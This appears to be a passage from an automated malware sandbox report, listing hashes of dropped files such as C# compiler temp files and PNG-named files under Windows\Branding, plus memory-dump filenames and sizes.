MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\h2ho53vk\CSC315E6786A4B544E09F5FFD97CBA384FF.TMP
MD5
07e93be6f95430842f8639214a52ab10

SHA1
8049a8e0d02b1341c9270e4e2308208c8bfcd053

SHA256
f1c37e5de006cd203539e89bfc1f7d50d2227b48d08aea11dace19989c1de828

SHA512
f1d2a90743c7dac68b0889836f289df6b7366e8c2c62df0d33eaaa85604b6a8e000d102b18c2d8a41653ee6b358e0af59d7770bff249cdd9a1474ecc3ad4adfe

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\h2ho53vk\h2ho53vk.0.cs
MD5
8e55cb0ca998472ab6d3e295e0c4dd50

SHA1
407d07a29b89fc3afc246c0680d5857e3f51019d

SHA256
63e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685

SHA512
c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\h2ho53vk\h2ho53vk.cmdline
MD5
e5399ec827f47ca1e0e58923f75f42dd

SHA1
bb17d917cd26dc698f5cca77a12a775a4b1d3a76

SHA256
6537f41b1d2b059dee5f6ddb30565b72aa1341d0407d07f21bf7feff982bd1e9

SHA512
c11d88730417f7449f401d48fb853d29938fe77a4505a19f6c84e654bf67001906a0151bb04b3ffb2b6e7e5c9d2520787fb8026493e55328db4f052263ea417d

Download Submit
\Windows\Branding\mediasrv.png
MD5
37fb7ba711ffbe9d6ebb27d54e827966

SHA1
4d4d9303e011bcb14720b24239a1aacd58122f47

SHA256
81b857da0878a957125253a0a5eb80d64c7ab9826797304813d8ed3c3e7f84c5

SHA512
3f0358b9e7d89fba96e6e9bbe804c26b886a4678a6aa49bc2e784bf180b86c863e3e9a54da71f6856f5b4bb7d28b4e56269dbf31015fdba3b4b808eb66e3aedf

Download Submit
\Windows\Branding\mediasvc.png
MD5
2f916498a393e2f0d008d33a74c062ba

SHA1
404d52d4253ef3843ae3f2c4aff050f37fcd3f08

SHA256
d5038b5227bc35e157dd225c7bb54f0bcf3ba8d8b48cbb930b4ccb65c23d3412

SHA512
d952a820a966c6cadc1750947d053d01e4e6476d074b6cd460555cc9f8417bd7412beebb65cfa8a121edcce9aab110a5909251146fce703d1b4e984788486f10

Download Submit
memory/272-104-0x0000000000000000-mapping.dmp

Download
memory/340-98-0x0000000000000000-mapping.dmp

Download
memory/404-122-0x0000000000000000-mapping.dmp

Download
memory/548-112-0x0000000000000000-mapping.dmp

Download
memory/548-92-0x0000000000000000-mapping.dmp

Download
memory/564-114-0x0000000000000000-mapping.dmp

Download
memory/564-96-0x0000000000000000-mapping.dmp

Download
memory/632-105-0x0000000000000000-mapping.dmp

Download
memory/680-32-0x0000000000000000-mapping.dmp

Download
memory/680-35-0x000007FEF45E0000-0x000007FEF4FCC000-memory.dmp

Filesize
9.9MB

Download
memory/840-95-0x0000000000000000-mapping.dmp

Download
memory/848-101-0x0000000000000000-mapping.dmp

Download
memory/872-102-0x0000000000000000-mapping.dmp

Download
memory/920-120-0x0000000000000000-mapping.dmp

Download
memory/924-126-0x0000000000000000-mapping.dmp

Download
memory/1020-121-0x0000000000000000-mapping.dmp

Download
memory/1020-88-0x0000000000000000-mapping.dmp

Download
memory/1036-13-0x0000000000000000-mapping.dmp

Download
memory/1064-91-0x0000000000000000-mapping.dmp

Download
memory/1064-123-0x0000000000000000-mapping.dmp

Download
memory/1080-115-0x0000000000000000-mapping.dmp

Download
memory/1088-106-0x0000000000000000-mapping.dmp

Download
memory/1100-22-0x0000000000000000-mapping.dmp

Download
memory/1100-33-0x0000000002760000-0x0000000002761000-memory.dmp

Filesize
4KB

Download
memory/1100-63-0x000000001BCC0000-0x000000001BCC1000-memory.dmp

Filesize
4KB

Download
memory/1100-28-0x0000000002570000-0x0000000002571000-memory.dmp

Filesize
4KB

Download
memory/1100-36-0x0000000001EA0000-0x0000000001EA1000-memory.dmp

Filesize
4KB

Download
memory/1100-76-0x000000001B8F0000-0x000000001B8F1000-memory.dmp

Filesize
4KB

Download
memory/1100-77-0x000000001BD00000-0x000000001BD01000-memory.dmp

Filesize
4KB

Download
memory/1100-24-0x000007FEF45E0000-0x000007FEF4FCC000-memory.dmp

Filesize
9.9MB

Download
memory/1164-93-0x0000000000000000-mapping.dmp

Download
memory/1336-85-0x0000000000000000-mapping.dmp

Download
memory/1416-97-0x0000000000000000-mapping.dmp

Download
memory/1496-90-0x0000000000000000-mapping.dmp

Download
memory/1520-130-0x0000000000000000-mapping.dmp

Download
memory/1568-10-0x0000000000000000-mapping.dmp

Download
memory/1604-111-0x0000000000000000-mapping.dmp

Download
memory/1616-103-0x0000000000000000-mapping.dmp

Download
memory/1636-48-0x000007FEF45E0000-0x000007FEF4FCC000-memory.dmp

Filesize
9.9MB

Download
memory/1636-40-0x0000000000000000-mapping.dmp

Download
memory/1684-1-0x0000000000900000-0x0000000000911000-memory.dmp

Filesize
68KB

Download
memory/1684-100-0x0000000000000000-mapping.dmp

Download
memory/1684-0-0x0000000000600000-0x00000000008F1000-memory.dmp

Filesize
2.9MB

Download
memory/1684-118-0x0000000000000000-mapping.dmp

Download
memory/1708-127-0x0000000000000000-mapping.dmp

Download
memory/1712-18-0x000000001ABF0000-0x000000001ABF1000-memory.dmp

Filesize
4KB

Download
memory/1712-4-0x0000000002450000-0x0000000002451000-memory.dmp

Filesize
4KB

Download
memory/1712-21-0x00000000024A0000-0x00000000024A1000-memory.dmp

Filesize
4KB

Download
memory/1712-7-0x0000000001D50000-0x0000000001D51000-memory.dmp

Filesize
4KB

Download
memory/1712-20-0x0000000024700000-0x0000000024701000-memory.dmp

Filesize
4KB

Download
memory/1712-9-0x000000001B680000-0x000000001B681000-memory.dmp

Filesize
4KB

Download
memory/1712-6-0x0000000001DF0000-0x0000000001DF1000-memory.dmp

Filesize
4KB

Download
memory/1712-2-0x0000000000000000-mapping.dmp

Download
memory/1712-3-0x000007FEF45E0000-0x000007FEF4FCC000-memory.dmp

Filesize
9.9MB

Download
memory/1712-19-0x000000001BA50000-0x000000001BA51000-memory.dmp

Filesize
4KB

Download
memory/1712-17-0x0000000002490000-0x0000000002491000-memory.dmp

Filesize
4KB

Download
memory/1712-5-0x000000001AD00000-0x000000001AD01000-memory.dmp

Filesize
4KB

Download
memory/1720-109-0x0000000000000000-mapping.dmp

Download
memory/1720-131-0x0000000000000000-mapping.dmp

Download
memory/1792-94-0x0000000000000000-mapping.dmp

Download
memory/1872-117-0x0000000000000000-mapping.dmp

Download
memory/1896-99-0x0000000000000000-mapping.dmp

Download
memory/1900-89-0x0000000000000000-mapping.dmp

Download
memory/1900-110-0x0000000000000000-mapping.dmp

Download
memory/1964-87-0x0000000000000000-mapping.dmp

Download